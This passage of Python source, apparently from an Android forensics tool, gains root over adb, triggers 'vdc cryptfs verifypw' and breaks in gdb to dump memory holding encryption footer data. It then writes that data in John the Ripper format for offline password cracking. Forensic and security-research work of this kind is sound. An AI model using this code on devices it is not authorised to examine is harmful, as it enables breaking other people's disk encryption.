        self.printer.print_debug("Staring vdc:")
        command = "%s shell %s vdc cryptfs verifypw 1234" % (
            self.adb.get_adb_path(), su)
        popen_args = shlex.split(command)
        self.printer.print_debug(command)
        vdc = subprocess.Popen(popen_args,
                               stdin=subprocess.PIPE,
                               stdout=subprocess.PIPE,
                               stderr=subprocess.PIPE)
        out = vdc.stdout.read(15)
        if (out.find("command cryptfs") == -1):
            self.printer.print_err("Could not start vdc: %s" % (out))
            self.printer.print_err(
                " Cleaning up! You should check the %s directory on the phone!"
                % (dest_dir))
            self.cleanup(gdb=gdb, gdbserver=gdbserver)
            return -1

        gdb.sendline("c")
        ret = gdb.expect(".*Breakpoint.*")
        self.printer.print_debug(
            "Breakpoint hit! Let's investigate the first parameter (r0)!")
        gdb.sendline("x /80bx $r0+32")
        gdb.expect(":")
        hex_list = []
        for i in range(0, 10):
            if (i == 0):
                line = gdb.before + gdb.readline()
            else:
                line = gdb.readline()
            hex_line = ''.join(line.split("\t")[1:]).replace(
                "0x", "").rstrip("\r\n").upper()
            hex_list.append(hex_line)

        self.write2john(''.join(hex_list))
        self.write2footer(''.join(hex_list))

        self.cleanup(gdb=gdb, gdbserver=gdbserver)

        return 1

    def print_info_adb(self, message, ok=True):
        if (ok):
            self.printer.printer.print_debug(
                "OK! Received the following from adb: %s" % message)
        else:
            self.printer.print_error(
                "ERROR! Received the following from adb: %s" % message)